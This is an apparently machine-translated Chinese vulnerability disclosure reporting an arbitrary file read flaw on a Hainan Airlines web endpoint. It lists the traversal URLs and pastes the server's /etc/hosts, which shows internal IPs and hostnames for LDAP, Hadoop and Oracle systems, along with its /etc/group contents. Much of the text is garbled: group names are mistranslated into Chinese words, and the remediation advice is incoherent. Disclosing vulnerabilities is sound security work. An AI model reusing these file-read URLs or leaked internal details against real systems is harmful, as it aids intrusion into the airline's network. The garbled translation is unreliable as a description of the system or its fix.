漏洞标题 海南航空有一个任意的文件阅读漏洞 相关制造商 Hnair.com 漏洞作者 过路人 提交时间 2016-05-11 17: 57 公共时间 2016-06-27 11: 30 漏洞类型 任何文件遍历/下载 危险等级 高 自我评估等级 15 漏洞状态 制造商已确认 标签标签 敏感信息泄露，任意文件读取，目录遍历，任意文件读取和利用，第三方不受信任的程序 漏洞详细信息 http://zzgq.hnair.com/frontend/ticketChange/ticketChange_toTicketChange.action

http://zzgq.hnair.com/tang/passwd

http://zzgq.hnair.com/tang/hosts 127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4 : 1 localhost localhost.localdomain localhost6 localhost6.localdomain6 10.2.40.141 petsrvhk51 10.72.14.21 ldapserver1.eking.com 10.72.14.22 ldapserver2.eking.com 10.2.40.159 pangu.loyoyo.com 10.2.40.156 webcki.travelsky.com 10.71.84.10 hadoopdn1 #discount门票访问jiesuan oracle 10.2.41.64 hnajs01-vip 10.2.41.66 hnajs02-vip http://zzgq.hnair.com/tang/group 根: x: 0: Bin: x: 1: bin，守护进程 守护进程: x: 2: bin，守护进程 系统: x: 3: bin，adm Adm: x: 4: adm，守护进程 Tty: x: 5: 磁盘: x: 6: Lp: x: 7:守护进程 Mem: x: 8: Kmem: x: 9: 轮: x: 10: 邮件: x: 12:邮件，postfix Uucp: x: 14: 男人: x: 15: 游戏: x: 20: Gopher: x: 30: 视频: x: 39: Dip: x: 40: Ftp: x: 50: 锁定: x: 54: 音频: x: 63: 没有人: x: 99: 用户: x: 100: 软盘: x: 19: Vcsa: x: 69: Utmp: x: 22: Utempter: x: 35: Cdrom: x: 11: 磁带: x: 33: 拨出: x: 18: Saslauth: x: 76: Postdrop: x: 90: 后缀: x: 89: 保险丝: x: 499: Sshd: x: 74: Jd: x: 501: Pn: x: 502: 8l: x: 503: Gs: x: 504: Resc: x: 505: Dt: x: 506: Ntp: x: 38: Rpc: x: 32: Rpcuser: x: 29: Nfsnobody: x: 65534: Nagios: x: 507: Logsee: x: 508: 系统管理系统: x: 800: Usr01: x: 801: Tcpdump: x: 72: Nscd: x: 28: Ldap: x: 55: Td-agent: x: 498: Gsbak: x: 3002: Pnbak: x: 3003: 8lbak: x: 3004: Apollo: x: 3005: Mobser: x: 3006: Ota: x: 3007: Memcached: x: 497: Y8: x: 3008: Hadoop: x: 3009: 漏洞证明： 1000-7 修理计划： 应该播放补丁，操作和维护应该是*，你可以尝试不遵循bb的操作和维护。 版权声明：请注明出处。居民A @乌云